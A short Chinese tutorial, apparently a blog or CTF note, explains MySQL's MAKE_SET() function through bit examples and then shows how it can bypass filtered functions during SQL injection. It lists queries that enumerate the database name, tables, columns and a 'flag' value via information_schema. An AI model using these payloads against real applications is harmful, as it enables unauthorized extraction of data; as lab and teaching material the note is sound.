1 返回一个设定值(含子字符串分隔字符串","字符),在设置位的相应位的字符串。str1对应于位0,str2到第1位,依此类推。在str1,str1有NULL值,…那么不添加到结果。
实验过程
1、bits将转为二进制,1的二进制为0000 0001,倒过来为1000 0000,所以取str1(a),打印a
select make_set("1","a","b","c");
2、bits将转为二进制,2的二进制为0000 0010,倒过来为0100 0000,所以取str2(b),打印b
select make_set("2","a","b","c");
3、bits将转为二进制,4的二进制为0000 0100,倒过来为0010 0000,所以取str3(c),打印c
select make_set("4","a","b","c");
3、bits将转为二进制,3的二进制为0000 0011,倒过来为1100 0000,所以取str1(a),str2(b),打印a,b
select make_set("3","a","b","c");
以此类推
在sql注入过程中,如果某些函数被禁用,可使用该函数进行绕过
举例如下
在test数据库下有test数据表,test数据表中存有flag,使用该函数进行查询
1、查询数据库名
select make_set("3","&",(select database()));
2、查询数据表
select make_set("3","&",(select group_concat(table_name) from information_schema.tables where table_schema=‘test‘));
3、查询字段名
select make_set("3","&",(select group_concat(column_name) from information_schema.columns where table_name=‘test‘));
4、查询字段数据
select make_set("3","&",(select flag from test.test));